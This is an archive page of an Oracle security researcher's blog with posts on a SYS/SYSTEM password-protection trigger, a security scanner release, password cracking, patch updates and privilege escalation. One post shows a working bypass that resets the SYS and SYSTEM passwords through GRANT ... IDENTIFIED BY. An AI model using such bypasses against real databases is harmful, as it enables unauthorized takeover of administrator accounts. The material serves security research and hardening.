Sie befinden sich in den Archiven der Kategorie Oracle Security.
| M | D | M | D | F | S | S |
|---|---|---|---|---|---|---|
| « Feb | ||||||
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
| 29 | 30 | 31 | ||||
- 11g (8)
- Allgemein (27)
- checkpwd (4)
- CPUApril2009 (2)
- CPUJan2009 (3)
- CPUJul2009 (2)
- CPUOct2009 (3)
- David Litchfield (7)
- Exploit (20)
- Forensics (4)
- Oracle Security (79)
- passwords (7)
- SAP (1)
- Security (18)
- Sentrigo (5)
- software (8)
- source code audit (5)
- SQL Injection (23)
- Tools (19)
- Trainings (2)
- Tutorial (2)
- 25 Feb 2010: 2 new ways to create error messages
- 24 Feb 2010: How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password and how to bypass it
- 23 Feb 2010: New Repscan 3.0 is available
- 22 Feb 2010: Really good whitepaper about "Hacking Oracle from the Web"
- 15 Feb 2010: Interesting Article about SQL Injection in Oracle by Mike Smithers
- 5 Feb 2010: Oracle Blackhat video removed from Website
- 4 Feb 2010: Oracle 11g 0day exploit published
- 30 Jan 2010: Selling stolen bank data to the government for 2.5 Million EUR?
- 6 Dez 2009: Dennis Yurichev wrote an article about his FPGA Oracle password cracker
- 29 Nov 2009: IGHASHGPU - Cracking Oracle Passwords with 790 Million Passwords/second
Oracle Security
Other Blogs
SQL Injection
Trainings
- Februar 2010
- Januar 2010
- Dezember 2009
- November 2009
- Oktober 2009
- September 2009
- August 2009
- Juli 2009
- Mai 2009
- April 2009
- März 2009
- Februar 2009
- Januar 2009
- Dezember 2008
- November 2008
- Oktober 2008
- August 2008
- Juli 2008
- Mai 2008
- April 2008
- März 2008
- Februar 2008
- Januar 2008
- Dezember 2007
- November 2007
- Oktober 2007
- September 2007
- August 2007
- Juli 2007
- Juni 2007
- Mai 2007
Archiv der Kategorie Oracle Security
How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password and how to bypass it
24 Feb 2010 von Alexander Kornbrust.
I found the following nice article “How to Prevent a User Granted the ALTER USER Privilege From Changing SYS/SYSTEM password” [271077.1] on My Oracle Support. As always if I see PL/SQL code I am looking for ways to find security problems or to bypass limitations.
SQL> conn / as sysdba
Connected.
SQL> CREATE or REPLACE TRIGGER prohibit_alter_SYSTEM_SYS_pass
AFTER ALTER on SCOTT.schema
BEGIN
IF ora_sysevent=’ALTER’ and ora_dict_obj_type = ‘USER’ and
(ora_dict_obj_name = ‘SYSTEM’ or ora_dict_obj_name = ‘SYS’)
THEN
RAISE_APPLICATION_ERROR(-20003,
‘You are not allowed to alter SYSTEM/SYS user.’);
END IF;
END;
/
Trigger created.
SQL> conn scott/tiger
Connected.
SQL>alter user system identified by alex;
alter user system identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5
SQL> alter user sys identified by alex;
alter user sys identified by alex
*
ERROR at line 1:
ORA-00604: error occurred at recursive SQL level 1
ORA-20003: You are not allowed to alter SYSTEM/SYS user.
ORA-06512: at line 5
SQL> alter user dbsnmp identified by dbsnmp;
User altered.
Many Oracle users are not aware that the grant command can also be used to change passwords or even create users (”grant dba to user1,user2 identified by user1,user2″). In our case we can use this technique to bypass the database trigger.
SQL> grant connect to sys identified by alex;
Grant succeeded.
SQL> grant connect to system identified by alex;
Grant succeeded.
To fix this problem we have to block grant commands as well….
Geschrieben in source code audit, Oracle Security | Drucken | 1 Kommentar »
New Repscan 3.0 is available
23 Feb 2010 von Alexander Kornbrust.
The latest version 3.0 of our database scanner Repscan is now available. This new version supports MS SQL Server and Oracle databases. Repscan comes with a large amount of new features and a complete new GUI (First database scanner with Office-2007 UI).
Here some of the new features of Repscan 3.0:
- Support for MS SQL Server (2000, 2005, 2008)
- Extremely user-friendly database configuration wizard (screenshot)
- Flexible tree control (re-group databases by status, hierarchy, …) (screenshot)
- Database security browser with drill down functionality (PDF, XLS, … export) (screenshot, screenshot)
- New reports (performance, used_features, …)
- Data Discovery (SSN, PII, Creditcard, Passwords, …)
- Database Enumeration (custom, NMap support) (screenshot)
- Pentest Features (Guess SID, Check default username/password combinations, …)
- Exploit & Code Library (screenshot)
- Version and Patch Information
- Skins
Here some (old) features of Repscan:
- Password plugin architecture
- Password plugins for Oracle DES, SHA1, OID, APEX, OVS
- Commandline features
- PL/SQL Source Code Analysis Report
Here some statements of Repscan 3.0 users:
“Repscan Rocks”, “I must have this tool.”, “Very cool stuff”, “really like the clean interface… checks are great”, “…tend to be more Oracle security information hub than just scanner :-)”
Over the next few weeks I will show here more details of some Repscan 3.0 features.
If you want to test Repscan 3.0 you can download it from our exclusive distributor Sentrigo
Geschrieben in software, Tools, source code audit, Security, Oracle Security, Allgemein | Drucken | Keine Kommentare »
Interesting Article about SQL Injection in Oracle by Mike Smithers
15 Feb 2010 von Alexander Kornbrust.
Mike Smithers, a former colleague, maintains a nice blog called “The Anti-Kyte“. He wrote a really interesting article “Self-Inflicted SQL Injection – don’t quote me !” about SQL Injection in Oracle.
Well written Mike.
Geschrieben in SQL Injection, Oracle Security, Allgemein | Drucken | Keine Kommentare »
Dennis Yurichev wrote an article about his FPGA Oracle password cracker
6 Dez 2009 von Alexander Kornbrust.
Dennis Yurichev wrote an interesting background article about his FPGA password cracker for Oracle, currently the fastest (known) way to brute force Oracle DES passwords.
Dennis mentioned in the article that “By Oracle’s password standard, first password symbol is always Latin character (one of 26)”. This is not exactely correct if you enclose the password in double quotes. In this case all characters are allowed. I tested the FPGA cracker with the following test case and it seems not to crack the hash (currently still running).
SQL> grant dba to x identified by “1″;
Grant succeeded.
SQL> select username,password from dba_users where username=’X';
USERNAME PASSWORD
—————————— ——————————
X 4D91C057D0C4D801
If you want to try his FPGA cracker here is the link.
Well done and very interesting article Dennis. The only thing I would be interestedis the price of the FPGA hardware.
Geschrieben in Tools, passwords, Oracle Security | Drucken | Keine Kommentare »
Metasploit 3.3 is out
17 Nov 2009 von Alexander Kornbrust.
Metasploit 3.3, the leading exploit framework is out. Here an extract from the Metasploit blog:
“Oracle exploit support has been implemented through a tag-team effort between MC and Chris Gates, with assistance from Alexander Kornbrust. Oracle modules have been developed for exploiting TNS protocol stack and Web-based Oracle services, as well as post-authentication database-level privilege escalation flaws. ”
Version 3.3. (release notes) is the largest known ruby application (375,000 lines of code) and comes with some new Oracle features
- Support for the Oracle InstantClient Ruby driver as an exploit mixin
- Extensive support for exploitation and post-exploitation tasks against Oracle databases
Have fun using Metasploit.
Geschrieben in Tools, Exploit, Oracle Security, Allgemein | Drucken | Keine Kommentare »
Oracle October 2009 CPU Published
21 Okt 2009 von Alexander Kornbrust.
Today Oracle released the October 2009 CPU.
In total 38 vulnerabilities were fixed with this CPU (or PSU). This CPU will fix 16 new vulnerabilities in the databases. 6 of them remotely exploitable without authentication, 1 affects client-only installations.
The following components are affected.
- Advanced Queuing
- Application Express
- Authentication
- CORE RDBMS
- Data Mining
- Net Foundation Layer
- Network Authentication
- Oracle Spatial
- Oracle Text
- PL/SQL
- RDBMS Data Pump
- RDBMS Security
- Workspace Manager
As always the usual suspect (Alexander, xxx) reported some of the vulnerabilities.
This time Oracle fixed 2 of ours vulnerabilities. Only 20 Oracle security issues are unfixed…. Oracle is getting better… Time to have a deeper look into 11.2
—-
Report of Critical Patch Update Fixes for Red Database Security
The following issues reported by you are fixed in the upcoming Critical
Patch Update, due to be released at 1pm, U.S. Pacific Time, on October
20, 2009. We ask that any information that you plan to publish
regarding these issues be released after this date and time.
This Critical Patch Update will contain fixes for the following issues:
Reporter: Alexander Kornbrust
9675691 SQL INJECTION IN UPGRADE SCRIPT CATMETX.SQL
10213261 AUDIT CAN BE BYPASSED USING DBMS_SYS_SQL.PARSE_AS_USER
Please let us know if you have any questions or concerns with this
report. Thank you for reporting these issues to Oracle and for your
patience while we investigated and created the fixes.
—-
I will post detailed information including sample code on my blog tomorrow. Especially the dbms_sys_sql bug is critical because it allows to bypass the Oracle Auditing completely (and products using Oracle Auditing like Oracle Audit Vault). Even if this bug is fixed now there are other (similar) bugs around which allow to bypass Oracle Auditing completely.
It took only approx. 2 years to fix the dbms_sys_sql problem.
Geschrieben in CPUOct2009, Oracle Security | Drucken | Keine Kommentare »
Paul Wright Released Whitepaper About “Create Table to OSDBA” (Preprocessor Exploit)
20 Okt 2009 von Alexander Kornbrust.
Paul Wright wrote an interesting whitepaper “Create table to OSDBA” about the new preprocessor feature in 11.1.0.7 and higher to run OS commands via tables. This whitepaper shows how to escalate privileges by running operating system commands using create table together with utl_file. In the future Oracle plans to backport the functionality to Oracle 10.2.0.5.
I already talked about the danger of running OS commands via “Create Table” in February 2009 “Trends 2009” (German slides, slide 20) and released in April 2009 a tutorial how to run OS commands via Create table, dbms_scheduler,extproc,plsql native 9, plsql native 10/11, Oracle text and alter systems.Paul added the idea executing files created with utl_file.
Oracle changed the preprocessor handling in Oracle 11.2.0.1. In 11.2.0.1 it is necessary to have the EXECUTE privileges on a directory objects (”Execute a preprocessor program that resides in the directory. A preprocessor program converts data to a supported format when loading data records from an external table with the ORACLE_LOADER access driver. Refer to Oracle Database Utilities for more information. This privilege does not implicitly allow READ access on the external table data.”).
Paul wrote a recommendation how to mitigate the preprocessor risk. He recommends to revoke utl_file from public. This is a good idea but keep in mind that there are multiple ways to create (text) files on OS level (e.g. Sample Exploit using dbms_advisor).
I would also recommend to grant read,write instead of granting ALL on directory objects (which includes EXECUTE in 11.2.0.1). And granting to PUBLIC is also always a bad idea. Grant privileges always to a role and/or user only.
Geschrieben in Exploit, Oracle Security | Drucken | 1 Kommentar »
Oracle Openworld 2009 - SQL Injection Presentation
13 Okt 2009 von Alexander Kornbrust.
Just back from a short trip to the Oracle Openworld where I gave a presentation “SQL Injection Crash Course for Developers“. This was the first time I talked at the Openworld in San Francisco. The feedback from the attendees was quite good.
In the SQL Injection presentation I showed some screenshots of the brand new web application scanner Netsparker (previously known as Dilemma) from Mavituna Security.
Netsparker is one of the most advanced web application scanner. Really professional GUI, easy to use. Well done Ferruh

Supports the execution of SQL statements and OS commands on the DB server.

I also met the APEX team from Oracle and had a long interesting chat with them. Joel Kallmann gave me a few tips how to harden my APEX 3.2.1 installation using mod_plsql.
What else happened in the Oracle security scene?
Slavik posted today an interesting blog entry about SQL Injection too.
Today Pete Finnigan published an entry about spoofing users and programs in Oracle. In his blog entry he mentions also the bug DB18 from January 2006, found by Imperva. AFAIK I was the first came up with the idea patching the oraclient9.dll using a hex editor and then I sent an email with a description to Pete.
Nowadays this trick is no longer necessary for exploiting this after David Litchfield released a small tool (part of OAK - Oracle Assessment Kit) called ora-auth-alter-session.exe. But for many other applications the client patching technique can be really useful.
Geschrieben in Tools, SQL Injection, Oracle Security, Allgemein | Drucken | Keine Kommentare »
IOUG 2009 Database Security Study - 50% increase in data breaches
1 Okt 2009 von Alexander Kornbrust.
Today the IOUG released a database security study. This study, sponsored by Oracle, revealed some interesting facts.
- 50% increase in data breaches since last year
- Internal threats (e.g. unauthorized users) is a bigger problem than external hackers
- Database adminstration outsourcing increased by 40%
- Nearly 50% of the organization use production data for non-production environments.
You can download the study from the oracle site.
Database security becomes more and more important. People should think about using Oracle security tools (e.g. our database security scanner (Repscan) or innovative security monitoring solutions (Hedgehog)) or to join our 5-day Oracle Anti-Hacker-Training.If you are interested in a (in-house) security training, just us an email.
- 50% increase in data breaches since last year
- Internal threats (e.g. unauthorized users) is a bigger problem than external hackers
- Database adminstration outsourcing increased by 40%
- Nearly 50% of the organization use production data for non-production environments.
You can download the study from the oracle site.
Geschrieben in Oracle Security, Allgemein | Drucken | Keine Kommentare »
Oracle 11.2.0.1.0 is available for download
1 Sep 2009 von Alexander Kornbrust.
I just saw on OTN that Oracle 11.2.0.1.0 is out.
New possibility for new security bugs ![]()
Geschrieben in Oracle Security | Drucken | Keine Kommentare »

